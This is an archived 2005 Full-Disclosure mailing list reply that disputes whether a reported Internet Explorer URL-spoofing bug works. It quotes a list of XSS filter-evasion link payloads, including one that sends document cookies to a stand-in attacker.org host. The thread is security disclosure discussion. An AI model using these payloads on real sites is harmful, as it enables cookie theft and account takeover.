lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <43583F9B.7070309@logicaldevelopments.com.au>
Date: Fri Oct 21 02:09:26 2005
From: jallen at logicaldevelopments.com.au (Justin Allen)
Subject: New (19.10.05) MS-IE Url Spoofing bug
	(by	K-Gen).

Did you even test those URLs? The only thing that happens is a message
box pops up, the status bar text also states that a message box will pop
up. The only thing it does is change the tooltip on the link to google.com.

-- 
Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889



Jerome Athias wrote:

>You can then mix it with some classical XSS tricks like
>
>Basic XSS test detected:
>
><a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a>
><a
>href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
>+document.cookies</script>">Click here</a>
>
>
>Basic XSS test :
>
><a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a>
>
>UTF-8:
>
><a
>href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41"
>title="http://www.google.com">hello</a>
>
>Long UTF-8 Unicode encoding without semicolons:
>
><a
>href=&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041
>title="http://www.google.com"
>onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a>
>
>Embedded newline to break up XSS:
>
><a href=jav&#x0A;ascript:alert('XSS'); title="http://www.google.com"
>hover="http://www.google.com">hello2</a>
>
>Embedded carriage return to break up XSS (doesn't appear as link):
>
><a href=jav&#x0D;ascript:alert('XSS'); title="http://www.google.com"
>onmouseover="image(this.href);">hello3</a>
>
>Inserting spaces in href link:
>
><a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a>
>
>
>etc...
>
>some bypass the Opera anti-illegal-urls
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ